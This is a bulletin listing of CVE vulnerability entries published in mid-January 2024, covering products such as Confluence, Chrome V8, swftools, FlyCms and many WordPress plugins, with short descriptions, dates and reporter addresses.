atlassian -- confluence_data_center/confluence_serverThis High severity Remote Code Execution (RCE) vulnerability was introduced in version 7.13.0 of Confluence Data Center and Server. Remote Code Execution (RCE) vulnerability, with a CVSS Score of 8.6 and a CVSS Vector of CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N allows an unauthenticated attacker to expose assets in your environment susceptible to exploitation which has high impact to confidentiality, no impact to integrity, no impact to availability, and does not require user interaction. Atlassian recommends that Confluence Data Center and Server customers upgrade to latest version, if you are unable to do so, upgrade your instance to one of the specified supported fixed versions: * Confluence Data Center and Server 7.19: Upgrade to a release 7.19.18, or any higher 7.19.x release * Confluence Data Center and Server 8.5: Upgrade to a release 8.5.5 or any higher 8.5.x release * Confluence Data Center and Server 8.7: Upgrade to a release 8.7.2 or any higher release See the release notes (https://confluence.atlassian.com/doc/confluence-release-notes-327.html ). You can download the latest version of Confluence Data Center and Server from the download center (https://www.atlassian.com/software/confluence/download-archives ).2024-01-16not yet calculatedCVE-2024-21674
security@atlassian.com
atos-- unify_ openscape_voice_V10A directory traversal vulnerability in the SOAP Server integrated in Atos Unify OpenScape Voice V10 before V10R3.26.1 allows a remote attacker to view the contents of arbitrary files in the local file system. An unauthenticated attacker might obtain sensitive files that allow for the compromise of the underlying system.2024-01-12not yet calculatedCVE-2023-48166
cve@mitre.org
cve@mitre.org
autotest_driver -- autotest_driverIn autotest driver, there is a possible out of bounds write due to improper input validation. This could lead to local denial of service with System execution privileges needed2024-01-18not yet calculatedCVE-2023-48359
security@unisoc.com
beetl-bbs -- beetl-bbsA Stored Cross Site Scripting (XSS) vulnerability in beetl-bbs 2.0 allows attackers to run arbitrary code via the post/save content parameter.2024-01-16not yet calculatedCVE-2024-22491
cve@mitre.org
clickhouse -- clickhouse-javaExposure of sensitive information in exceptions in ClichHouse's clickhouse-r2dbc, com.clickhouse:clickhouse-jdbc, and com.clickhouse:clickhouse-client versions less than 0.4.6 allows unauthorized users to gain access to client certificate passwords via client exception logs. This occurs when 'sslkey' is specified and an exception, such as a ClickHouseException or SQLException, is thrown during database operations; the certificate password is then included in the logged exception message.2024-01-19not yet calculatedCVE-2024-23689
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
cohesity-- dataprotectCohesity DataProtect 6.8.1 and 6.6.0d was discovered to have a incorrect access control vulnerability due to a lack of TLS Certificate Validation.2024-01-19not yet calculatedCVE-2023-33295
cve@mitre.org
cve@mitre.org
concise_binary_object_representation -- concise_binary_object_representationInefficient algorithmic complexity in DecodeFromBytes function in com.upokecenter.cbor Java implementation of Concise Binary Object Representation (CBOR) versions 4.0.0 to 4.5.1 allows an attacker to cause a denial of service by passing a maliciously crafted input. Depending on an application's use of this library, this may be a remote attacker.2024-01-19not yet calculatedCVE-2024-23684
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
consensys -- discoveryConsensys Discovery versions less than 0.4.5 uses the same AES/GCM nonce for the entire session. which should ideally be unique for every message. The node's private key isn't compromised, only the session key generated for specific peer communication is exposed.2024-01-19not yet calculatedCVE-2024-23688
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
d-link -- go-rt-ac750_v101b03In D-LINK Go-RT-AC750 v101b03, the sprintf function in the sub_40E700 function within the cgibin is susceptible to stack overflow.2024-01-16not yet calculatedCVE-2024-22916
cve@mitre.org
cve@mitre.org
dependencycheck_for_maven --dependencycheck_for_mavenDependencyCheck for Maven 9.0.0 to 9.0.6, for CLI version 9.0.0 to 9.0.5, and for Ant versions 9.0.0 to 9.0.5, when used in debug mode, allows an attacker to recover the NVD API Key from a log file.2024-01-19not yet calculatedCVE-2024-23686
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
dom96 -- httpbeast_v.0.4.1An issue in dom96 HTTPbeast v.0.4.1 and before allows a remote attacker to execute arbitrary code via a crafted request to the parser.nim component.2024-01-19not yet calculatedCVE-2023-50694
cve@mitre.org
cve@mitre.org
cve@mitre.org
dom96 -- jester_ v.0.6.0An issue in dom96 Jester v.0.6.0 and before allows a remote attacker to execute arbitrary code via a crafted request.2024-01-19not yet calculatedCVE-2023-50693
cve@mitre.org
cve@mitre.org
cve@mitre.org
drm_driver -- drm_driverIn drm driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with System execution privileges needed2024-01-18not yet calculatedCVE-2023-48358
security@unisoc.com
drupal -- coreDrupal contains a vulnerability with improper handling of structural elements. If this vulnerability is exploited, an attacker may be able to cause a denial-of-service (DoS) condition.2024-01-16not yet calculatedCVE-2024-22362
vultures@jpcert.or.jp
vultures@jpcert.or.jp
vultures@jpcert.or.jp
vultures@jpcert.or.jp
e-cology -- e-cologyAn issue in weaver e-cology v.10.0.2310.01 allows a remote attacker to execute arbitrary code via a crafted script to the FrameworkShellController component.2024-01-20not yet calculatedCVE-2023-51892
cve@mitre.org
cve@mitre.org
cve@mitre.org
ebyte -- e880-ir01-v1.1An issue discovered in EBYTE E880-IR01-V1.1 allows an attacker to obtain sensitive information via crafted POST request to /cgi-bin/luci.2024-01-18not yet calculatedCVE-2023-50614
cve@mitre.org
edimax-- BR6478AC_V2_firmwareA stack-based buffer overflow vulnerability in /bin/webs binary in Edimax BR6478AC V2 firmware version v1.23 allows attackers to overwrite other values located on the stack due to an incorrect use of the strcpy() function.2024-01-16not yet calculatedCVE-2023-49351
cve@mitre.org
ejinshan -- v8+_terminal_secuirty_systemFile upload vulnerability in ejinshan v8+ terminal security system allows attackers to upload arbitrary files to arbitrary locations on the server.2024-01-20not yet calculatedCVE-2021-31314
cve@mitre.org
emlog -- pro_v2.1.14Emlog Pro v2.1.14 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /admin/article.php?action=write.2024-01-16not yet calculatedCVE-2023-41619
cve@mitre.org
cve@mitre.org
enonic_xp -- enonic_xpEnonic XP versions less than 7.7.4 are vulnerable to a session fixation issue. An remote and unauthenticated attacker can use prior sessions due to the lack of invalidating session attributes.2024-01-19not yet calculatedCVE-2024-23679
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
examsys -- examsysExamSys 9150244 allows SQL Injection via the /Support/action/Pages.php s_score2 parameter.2024-01-17not yet calculatedCVE-2023-52285
cve@mitre.org
cve@mitre.org
flaskcode_for_python -- flaskcode_for_pythonAn issue was discovered in the flaskcode package through 0.0.8 for Python. An unauthenticated directory traversal, exploitable with a GET request to a /resource-data/<file_path>.txt URI (from views.py), allows attackers to read arbitrary files.2024-01-13not yet calculatedCVE-2023-52288
cve@mitre.org
flaskcode_for_python -- flaskcode_for_pythonAn issue was discovered in the flaskcode package through 0.0.8 for Python. An unauthenticated directory traversal, exploitable with a POST request to a /update-resource-data/<file_path> URI (from views.py), allows attackers to write to arbitrary files.2024-01-13not yet calculatedCVE-2023-52289
cve@mitre.org
flycms -- flycmsFlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/score/scorerule_save2024-01-18not yet calculatedCVE-2024-22601
cve@mitre.org
flycms -- flycmsFlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/links/add_link2024-01-18not yet calculatedCVE-2024-22603
cve@mitre.org
flycms -- flycmsFlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/admin/update_group_save.2024-01-18not yet calculatedCVE-2024-22699
cve@mitre.org
flycms -- flycmsFlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/email/email_conf_updagte2024-01-18not yet calculatedCVE-2024-22817
cve@mitre.org
flycms -- flycmsFlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerbility via /system/site/filterKeyword_save2024-01-18not yet calculatedCVE-2024-22818
cve@mitre.org
flycms -- flycmsFlyCms v1.0 contains a Cross-Site Request Forgery (CSRF) vulnerability via /system/email/email_templets_update.2024-01-18not yet calculatedCVE-2024-22819
cve@mitre.org
folio -- mod-data-export-springHard-coded credentials in FOLIO mod-data-export-spring versions before 1.5.4 and from 2.0.0 to 2.0.2 allows unauthenticated users to access critical APIs, modify user data, modify configurations including single-sign-on, and manipulate fees/fines.2024-01-19not yet calculatedCVE-2024-23687
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
form_vibes -- form_vibesThe plugin does not filter the "delete_entries" parameter from user requests, leading to an SQL Injection vulnerability.2024-01-16not yet calculatedCVE-2022-3764
contact@wpscan.com
fusionpbx -- fusionpbxFusionPBX prior to 5.1.0 contains a cross-site scripting vulnerability. If this vulnerability is exploited by a remote authenticated attacker with an administrative privilege, an arbitrary script may be executed on the web browser of the user who is logging in to the product.2024-01-19not yet calculatedCVE-2024-23387
vultures@jpcert.or.jp
vultures@jpcert.or.jp
vultures@jpcert.or.jp
gentoo -- pkg_postinstpkg_postinst in the Gentoo ebuild for Slurm through 22.05.3 unnecessarily calls chown to assign root's ownership on files in the live root filesystem. This could be exploited by the slurm user to become the owner of root-owned files.2024-01-15not yet calculatedCVE-2020-36770
cve@mitre.org
gentoo_portage -- gentoo_portageIn Gentoo Portage before 3.0.47, there is missing PGP validation of executed code: the standalone emerge-webrsync downloads a .gpgsig file but does not perform signature verification. Unless emerge-webrsync is used, Portage is not vulnerable.2024-01-12not yet calculatedCVE-2016-20021
cve@mitre.org
cve@mitre.org
cve@mitre.org
google -- chromeOut of bounds write in V8 in Google Chrome prior to 120.0.6099.224 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)2024-01-16not yet calculatedCVE-2024-0517
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
google -- chromeType confusion in V8 in Google Chrome prior to 120.0.6099.224 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)2024-01-16not yet calculatedCVE-2024-0518
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
google -- chromeOut of bounds memory access in V8 in Google Chrome prior to 120.0.6099.224 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)2024-01-16not yet calculatedCVE-2024-0519
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
chrome-cve-admin@google.com
gpu -- kernelA GPU kernel can read sensitive data from another GPU kernel (even from another user or app) through an optimized GPU memory region called _local memory_ on various architectures.2024-01-16not yet calculatedCVE-2023-4969
cret@cert.org
cret@cert.org
cret@cert.org
cret@cert.org
cret@cert.org
grn -- evewa3_communityCross Site Scripting (XSS) vulnerability in GRN Software Group eVEWA3 Community version 31 through 53, allows attackers to gain escalated privileges via crafted request to login panel.2024-01-17not yet calculatedCVE-2023-25295
cve@mitre.org
cve@mitre.org
cve@mitre.org
hummerrisk -- hummerriskAn issue in HummerRisk HmmerRisk v.1.10 thru 1.4.1 allows an authenticated attacker to execute arbitrary code via a crafted request to the service/LicenseService component.2024-01-16not yet calculatedCVE-2023-43449
cve@mitre.org
jasper -- jasperAn invalid memory write issue in Jasper-Software Jasper v.4.1.1 and before allows a local attacker to execute arbitrary code.2024-01-16not yet calculatedCVE-2023-51257
cve@mitre.org
jave2 -- jave2An issue was discovered in Jave2 version 3.3.1, allows attackers to execute arbitrary code via the FFmpeg function.2024-01-12not yet calculatedCVE-2023-48909
cve@mitre.org
cve@mitre.org
joommasters_for_prestashop -- joommasters_for_prestashopIn the module "Jms Setting" (jmssetting) from Joommasters for PrestaShop, a guest can perform SQL injection in versions <= 1.1.0. The method `JmsSetting::getSecondImgs()` has a sensitive SQL call that can be executed with a trivial http call and exploited to forge a blind SQL injection.2024-01-19not yet calculatedCVE-2023-50030
cve@mitre.org
cve@mitre.org
jpg_driver -- jpg_driverIn jpg driver, there is a possible missing permission check. This could lead to local information disclosure with System execution privileges needed2024-01-18not yet calculatedCVE-2023-48339
security@unisoc.com
jpg_driver -- jpg_driverIn jpg driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with System execution privileges needed2024-01-18not yet calculatedCVE-2023-48355
security@unisoc.com
jpg_driver -- jpg_driverIn jpg driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with System execution privileges needed2024-01-18not yet calculatedCVE-2023-48356
security@unisoc.com
knovos -- discovery_v.22.67.0An issue in Knovos Discovery v.22.67.0 allows a remote attacker to obtain sensitive information via the /DiscoveryReview/Service/CaseManagement.svc/GetProductSiteName component.2024-01-16not yet calculatedCVE-2023-47459
cve@mitre.org
cve@mitre.org
knovos-- discovery_v.22.67.0SQL injection vulnerability in Knovos Discovery v.22.67.0 allows a remote attacker to execute arbitrary code via the /DiscoveryProcess/Service/Admin.svc/getGridColumnStructure component.2024-01-16not yet calculatedCVE-2023-47460
cve@mitre.org
cve@mitre.org
kodbox -- kodboxAn issue discovered in kodbox through 1.43 allows attackers to arbitrarily add Administrator accounts via crafted GET request.2024-01-16not yet calculatedCVE-2023-39691
cve@mitre.org
kodbox -- kodboxkodbox v1.43 was discovered to contain a cross-site scripting (XSS) vulnerability via the operation and login logs.2024-01-16not yet calculatedCVE-2023-52068
cve@mitre.org
kodbox -- kodboxkodbox v1.49.04 was discovered to contain a cross-site scripting (XSS) vulnerability via the URL parameter.2024-01-17not yet calculatedCVE-2023-52069
cve@mitre.org
cve@mitre.org
libebml -- libebmlIn libebml before 1.4.5, an integer overflow in MemIOCallback.cpp can occur when reading or writing. It may result in buffer overflows.2024-01-12not yet calculatedCVE-2023-52339
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
linux -- kernelA use-after-free issue was found in igmp_start_timer in net/ipv4/igmp.c in the network sub-component in the Linux Kernel. This flaw allows a local user to observe a refcnt use-after-free issue when receiving an igmp query packet, leading to a kernel information leak.2024-01-16not yet calculatedCVE-2024-0584
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
meta -- spark_studioPrior to v176, when opening a new project Meta Spark Studio would execute scripts defined inside of a package.json file included as part of that project. Those scripts would have the ability to execute arbitrary code on the system as the application.2024-01-16not yet calculatedCVE-2024-23347
cve-assign@fb.com
mingsoft -- mcmsAn issue in mingSoft MCMS v.5.2.4 allows a a remote attacker to obtain sensitive information via a crafted script to the password parameter.2024-01-16not yet calculatedCVE-2023-51282
cve@mitre.org
cve@mitre.org
mod-remote-storage -- mod-remote-storageHard-coded credentials in mod-remote-storage versions under 1.7.2 and from 2.0.0 to 2.0.3 allows unauthorized users to gain read access to mod-inventory-storage records including instances, holdings, items, contributor-types, and identifier-types.2024-01-19not yet calculatedCVE-2024-23685
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
moko_technology_ltd -- mokosmart_ mkgw1_ble_gateway_v.1.1.1An issue in MOKO TECHNOLOGY LTD MOKOSmart MKGW1 BLE Gateway v.1.1.1 and before allows a remote attacker to escalate privileges via the session management component of the administrative web interface.2024-01-16not yet calculatedCVE-2023-51059
cve@mitre.org
cve@mitre.org
molecularfaces -- molecularfacesMolecularFaces before 0.3.0 is vulnerable to cross site scripting. A remote attacker can execute arbitrary JavaScript in the context of a victim browser via crafted molfiles.2024-01-19not yet calculatedCVE-2024-0758
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
multisigwallet_0xf0c99 -- multisigwallet_0xf0c99MultiSigWallet 0xF0C99 was discovered to contain a reentrancy vulnerability via the function executeTransaction.2024-01-19not yet calculatedCVE-2023-47033
cve@mitre.org
cve@mitre.org
ncr -- terminal_ handler_v.1.5.1Cross Site Request Forgery vulnerability in NCR Terminal Handler v.1.5.1 allows a remote attacker to obtain sensitive information and escalate privileges via a crafted script to the UserSelfService component.2024-01-20not yet calculatedCVE-2023-47024
cve@mitre.org
cve@mitre.org
nextcloud -- security-advisoriesDeck is a kanban style organization tool aimed at personal planning and project organization for teams integrated with Nextcloud. In affected versions users could be tricked into executing malicious code that would execute in their browser via HTML sent as a comment. It is recommended that the Nextcloud Deck is upgraded to version 1.9.5 or 1.11.2. There are no known workarounds for this vulnerability.2024-01-18not yet calculatedCVE-2024-22213
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
ofcms -- ofcmsCross Site Scripting vulnerability in OFCMS v.1.14 allows a remote attacker to obtain sensitive information via a crafted payload to the title addition component.2024-01-16not yet calculatedCVE-2023-51807
cve@mitre.org
cve@mitre.org
cve@mitre.org
openvswitch -- openvswitchopenvswitch 2.17.8 was discovered to contain a memory leak via the function xmalloc__ in openvswitch-2.17.8/lib/util.c.2024-01-19not yet calculatedCVE-2024-22563
cve@mitre.org
paddle -- paddleCode Injection in paddlepaddle/paddle2024-01-20not yet calculatedCVE-2024-0521
security@huntr.dev
perl -- spreadsheet::parsexlsxThe Spreadsheet::ParseXLSX package before 0.30 for Perl allows XXE attacks because it neglects to use the no_xxe option of XML::Twig.2024-01-18not yet calculatedCVE-2024-23525
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
phasecheckserver -- phasecheckserverIn phasecheckserver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with no additional execution privileges needed2024-01-18not yet calculatedCVE-2023-48352
security@unisoc.com
pillow -- pillowPillow through 10.1.0 allows PIL.ImageMath.eval Arbitrary Code Execution via the environment parameter, a different vulnerability than CVE-2022-22817 (which was about the expression parameter).2024-01-19not yet calculatedCVE-2023-50447
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
pops!_rebel_for_andriod -- pops!_rebel_for_andriodThe POPS! Rebel application 5.0 for Android, in POPS! Rebel Bluetooth Glucose Monitoring System, sends unencrypted glucose measurements over BLE.2024-01-20not yet calculatedCVE-2023-46447
cve@mitre.org
cve@mitre.org
cve@mitre.org
prestashop -- prestashopIn the module mib < 1.6.1 from MyPresta.eu for PrestaShop, a guest can perform SQL injection. The methods `mib::getManufacturersByCategory()` has sensitive SQL calls that can be executed with a trivial http call and exploited to forge a SQL injection.024-01-19not yet calculatedCVE-2023-46351
cve@mitre.org
cve@mitre.org
prestashop_modules_for_prestashop -- prestashop_modules_for_prestashopIn the module "Sliding cart block" (blockslidingcart) up to version 2.3.8 from PrestashopModules.eu for PrestaShop, a guest can perform SQL injection.2024-01-19not yet calculatedCVE-2023-50028
cve@mitre.org
cve@mitre.org
relax-and-recover -- relax-and-recoverRelax-and-Recover (aka ReaR) through 2.7 creates a world-readable initrd when using GRUB_RESCUE=y. This allows local attackers to gain access to system secrets otherwise only readable by root.2024-01-12not yet calculatedCVE-2024-23301
cve@mitre.org
cve@mitre.org
rptc_0x3b08c -- rptc_0x3b08cRPTC 0x3b08c was discovered to not conduct status checks on the parameter tradingOpen. This vulnerability can allow attackers to conduct unauthorized transfer operations.2024-01-19not yet calculatedCVE-2023-47035
cve@mitre.org
cve@mitre.org
rymcu_forest -- rymcu_forestAn issue in rymcu forest v.0.02 allows a remote attacker to obtain sensitive information via manipulation of the HTTP body URL in the com.rymcu.forest.web.api.common.UploadController file.2024-01-13not yet calculatedCVE-2023-51804
cve@mitre.org
scada-- lts_v2.7.5.2 build_4551883606An issue was discovered in Scada-LTS v2.7.5.2 build 4551883606 and before, allows remote attackers with low-level authentication to escalate privileges, execute arbitrary code, and obtain sensitive information via Event Handlers function.2024-01-13not yet calculatedCVE-2023-33472
cve@mitre.org
sonicwall -- capture_client_for_windowsSonicWall Capture Client version 3.7.10, NetExtender client version 10.2.337 and earlier versions are installed with sfpmonitor.sys driver. The driver has been found to be vulnerable to Denial-of-Service (DoS) caused by Stack-based Buffer Overflow vulnerability.2024-01-18not yet calculatedCVE-2023-6340
PSIRT@sonicwall.com
spip -- spipSPIP before 4.1.14 and 4.2.x before 4.2.8 allows XSS via the name of an uploaded file. This is related to javascript/bigup.js and javascript/bigup.utils.js.2024-01-19not yet calculatedCVE-2024-23659
cve@mitre.org
cve@mitre.org
cve@mitre.org
stackideas -- easydiscussSQL injection vulnerability in StackIdeas EasyDiscuss v.5.0.5 and fixed in v.5.0.10 allows a remote attacker to obtain sensitive information via a crafted request to the search parameter in the Users module.2024-01-16not yet calculatedCVE-2023-51810
cve@mitre.org
cve@mitre.org
cve@mitre.org
strangbee -- thehiveStrangeBee TheHive 5.1.0 to 5.1.9 and 5.2.0 to 5.2.8 is vulnerable to Cross Site Scripting (XSS) in the case attachment functionality which enables an attacker to upload a malicious HTML file with Javascript code that will be executed in the context of the The Hive application using a specific URL. The vulnerability can be used to coerce a victim account to perform specific actions on the application as helping an analyst becoming administrator.2024-01-19not yet calculatedCVE-2024-22876
cve@mitre.org
strangbee -- thehiveStrangeBee TheHive 5.2.0 to 5.2.8 is vulnerable to Cross Site Scripting (XSS) in the case reporting functionality. This feature allows an attacker to insert malicious JavaScript code inside the template or its variables, that will be executed in the context of the TheHive application when the HTML report is opened.2024-01-19not yet calculatedCVE-2024-22877
cve@mitre.org
studio_network_solutions -- sharebrowserStudio Network Solutions ShareBrowser before 7.0 on macOS mishandles signature verification, aka PMP-2636.2024-01-17not yet calculatedCVE-2023-44077
cve@mitre.org
stupid_simple_cms --stupid_simple_cmsStupid Simple CMS <=1.2.4 is vulnerable to Cross Site Scripting (XSS) in the editing section of the article content.2024-01-17not yet calculatedCVE-2024-22714
cve@mitre.org
stupid_simple_cms --stupid_simple_cmsStupid Simple CMS <=1.2.4 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin-edit.php.2024-01-17not yet calculatedCVE-2024-22715
cve@mitre.org
sunnytoo -- stblogsearchSunnyToo stblogsearch up to v1.0.0 was discovered to contain a SQL injection vulnerability via the StBlogSearchClass::prepareSearch component.2024-01-19not yet calculatedCVE-2023-43985
cve@mitre.org
cve@mitre.org
swftools -- swftoolsswftools 0.9.2 was discovered to contain a Stack Buffer Underflow via the function dict_foreach_keyvalue at swftools/lib/q.c.2024-01-19not yet calculatedCVE-2024-22562
cve@mitre.org
swftools -- swftoolsA stack-buffer-underflow vulnerability was found in SWFTools v0.9.2, in the function parseExpression at src/swfc.c:2602.2024-01-19not yet calculatedCVE-2024-22911
cve@mitre.org
swftools -- swftoolsA global-buffer-overflow was found in SWFTools v0.9.2, in the function countline at swf5compiler.flex:327. It allows an attacker to cause code execution.2024-01-19not yet calculatedCVE-2024-22912
cve@mitre.org
swftools -- swftoolsA heap-buffer-overflow was found in SWFTools v0.9.2, in the function swf5lex at lex.swf5.c:1321. It allows an attacker to cause code execution.2024-01-19not yet calculatedCVE-2024-22913
cve@mitre.org
swftools -- swftoolsA heap-use-after-free was found in SWFTools v0.9.2, in the function input at lex.swf5.c:2620. It allows an attacker to cause denial of service.2024-01-19not yet calculatedCVE-2024-22914
cve@mitre.org
swftools -- swftoolsA heap-use-after-free was found in SWFTools v0.9.2, in the function swf_DeleteTag at rfxswf.c:1193. It allows an attacker to cause code execution.2024-01-19not yet calculatedCVE-2024-22915
cve@mitre.org
swftools -- swftoolsswftools0.9.2 was discovered to contain a global-buffer-overflow vulnerability via the function parseExpression at swftools/src/swfc.c:2587.2024-01-19not yet calculatedCVE-2024-22919
cve@mitre.org
swftools -- swftoolsswftools 0.9.2 was discovered to contain a heap-use-after-free via the function bufferWriteData in swftools/lib/action/compile.c.2024-01-19not yet calculatedCVE-2024-22920
cve@mitre.org
swftools -- swftoolsswftools 0.9.2 was discovered to contain a stack-buffer-underflow vulnerability via the function parseExpression at swftools/src/swfc.c:2576.2024-01-19not yet calculatedCVE-2024-22955
cve@mitre.org
swftools -- swftoolsswftools 0.9.2 was discovered to contain a heap-use-after-free vulnerability via the function removeFromTo at swftools/src/swfc.c:8382024-01-19not yet calculatedCVE-2024-22956
cve@mitre.org
swftools -- swftoolsswftools 0.9.2 was discovered to contain an Out-of-bounds Read vulnerability via the function dict_do_lookup in swftools/lib/q.c:1190.2024-01-19not yet calculatedCVE-2024-22957
cve@mitre.org
tduck-platform -- tduck-platformSQL Injection vulnerability in TDuckCLoud tduck-platform v.4.0 allows a remote attacker to obtain sensitive information via the getFormKey parameter in the search function of FormDataMysqlService.java file.2024-01-13not yet calculatedCVE-2023-51805
cve@mitre.org
telephone_service-- telephone_serviceIn telephone service, there is a possible improper input validation. This could lead to local information disclosure with no additional execution privileges needed2024-01-18not yet calculatedCVE-2023-48354
security@unisoc.com
tenghutos -- tws-200An issue discovered in TenghuTOS TWS-200 firmware version: V4.0-201809201424 allows a remote attacker to execute arbitrary code via crafted command on the ping page component.2024-01-18not yet calculatedCVE-2023-51217
cve@mitre.org
three_r_solution_corporation_(japan) -- multiple_productsInsufficient technical documentation issue exists in thermal camera TMC series all firmware versions. The user of the affected product is not aware of the internally saved data. By accessing the affected product physically, an attacker may retrieve the internal data.2024-01-15not yet calculatedCVE-2024-22028
vultures@jpcert.or.jp
vultures@jpcert.or.jp
tp_link --wifi_cameraInsecure Permission vulnerability in TP Link TC70 and C200 WIFI Camera v.3 firmware v.1.3.4 and fixed in v.1.3.11 allows a physically proximate attacker to obtain sensitive information via a connection to the UART pin components.2024-01-17not yet calculatedCVE-2023-49515
cve@mitre.org
cve@mitre.org
uniswapfrontrunbot_0xdb94c -- uniswapfrontrunbot_0xdb94cA vulnerability in UniswapFrontRunBot 0xdB94c allows attackers to cause financial losses via unspecified vectors.2024-01-19not yet calculatedCVE-2023-47034
cve@mitre.org
cve@mitre.org
vsp_drive -- vsp_driveIn vsp driver, there is a possible use after free due to a logic error. This could lead to local denial of service with System execution privileges needed2024-01-18not yet calculatedCVE-2023-48353
security@unisoc.com
vsp_driver -- vsp_driverIn vsp driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service with System execution privileges needed2024-01-18not yet calculatedCVE-2023-48357
security@unisoc.com
webkul_qloapps -- webkul_qloappsAn issue in webkul qloapps before v1.6.0 allows an attacker to obtain sensitive information via the id_order parameter.2024-01-17not yet calculatedCVE-2023-36235
cve@mitre.org
cve@mitre.org
cve@mitre.org
wordpress -- wordpressThe Contact Form by WD WordPress plugin through 1.13.23 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin2024-01-16not yet calculatedCVE-2023-2655
contact@wpscan.com
wordpress  -- wordpressThe Advanced AJAX Product Filters WordPress plugin does not sanitize the 'term_id' POST parameter before outputting it in the page, leading to reflected Cross-Site Scripting issue.2024-01-16not yet calculatedCVE-2021-24432
contact@wpscan.com
wordpress  -- wordpressThe simple sort&search WordPress plugin through 0.0.3 does not make sure that the indexurl parameter of the shortcodes "category_sims", "order_sims", "orderby_sims", "period_sims", and "tag_sims" use allowed URL protocols, which can lead to stored cross-site scripting by users with a role as low as Contributor2024-01-16not yet calculatedCVE-2021-24433
contact@wpscan.com
wordpress  -- wordpressThe Qyrr WordPress plugin before 0.7 does not escape the data-uri of the QR Code when outputting it in a src attribute, allowing for Cross-Site Scripting attacks. Furthermore, the data_uri_to_meta AJAX action, available to all authenticated users, only had a CSRF check in place, with the nonce available to users with a role as low as Contributor allowing any user with such role (and above) to set a malicious data-uri in arbitrary QR Code posts, leading to a Stored Cross-Site Scripting issue.2024-01-16not yet calculatedCVE-2021-24559
contact@wpscan.com
wordpress  -- wordpressThe WooCommerce Currency Switcher FOX WordPress plugin before 1.3.7 was vulnerable to LFI attacks via the "woocs" shortcode.2024-01-16not yet calculatedCVE-2021-24566
contact@wpscan.com
contact@wpscan.com
wordpress  -- wordpressThe Super Forms - Drag & Drop Form Builder WordPress plugin before 6.0.4 does not escape the bob_czy_panstwa_sprawa_zostala_rozwiazana parameter before outputting it back in an attribute via the super_language_switcher AJAX action, leading to a Reflected Cross-Site Scripting. The action is also lacking CSRF, making the attack easier to perform against any user.2024-01-16not yet calculatedCVE-2022-0402
contact@wpscan.com
contact@wpscan.com
wordpress  -- wordpressThe WPGraphQL WooCommerce WordPress plugin before 0.12.4 does not prevent unauthenticated attackers from enumerating a shop's coupon codes and values via GraphQL.2024-01-16not yet calculatedCVE-2022-1563
contact@wpscan.com
contact@wpscan.com
wordpress -- wordpressThe School Management WordPress plugin before 9.9.7 contains an obfuscated backdoor injected in it's license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site.2024-01-16not yet calculatedCVE-2022-1609
contact@wpscan.com
wordpress  -- wordpressThe Coru LFMember WordPress plugin through 1.0.2 does not have CSRF check in place when adding a new game, and is lacking sanitization as well as escaping in their settings, allowing attacker to make a logged in admin add an arbitrary game with XSS payloads2024-01-16not yet calculatedCVE-2022-1618
contact@wpscan.com
wordpress  -- wordpressThe Core Control WordPress plugin through 1.2.1 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack2024-01-16not yet calculatedCVE-2022-1760
contact@wpscan.com
wordpress -- wordpressThe Contact Form & Lead Form Elementor Builder WordPress plugin before 1.7.0 does not escape some of its form fields before outputting them in attributes, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed2024-01-16not yet calculatedCVE-2022-23179
contact@wpscan.com
wordpress  -- wordpressThe Contact Form & Lead Form Elementor Builder WordPress plugin before 1.7.4 doesn't have authorisation and nonce checks, which could allow any authenticated users, such as subscriber to update and change various settings2024-01-16not yet calculatedCVE-2022-23180
contact@wpscan.com
contact@wpscan.com
wordpress  -- wordpressThe Slide Anything WordPress plugin before 2.3.47 does not properly sanitize or escape the slide title before outputting it in the admin pages, allowing a logged in user with roles as low as Author to inject a javascript payload into the slide title even when the unfiltered_html capability is disabled.2024-01-16not yet calculatedCVE-2022-2413
contact@wpscan.com
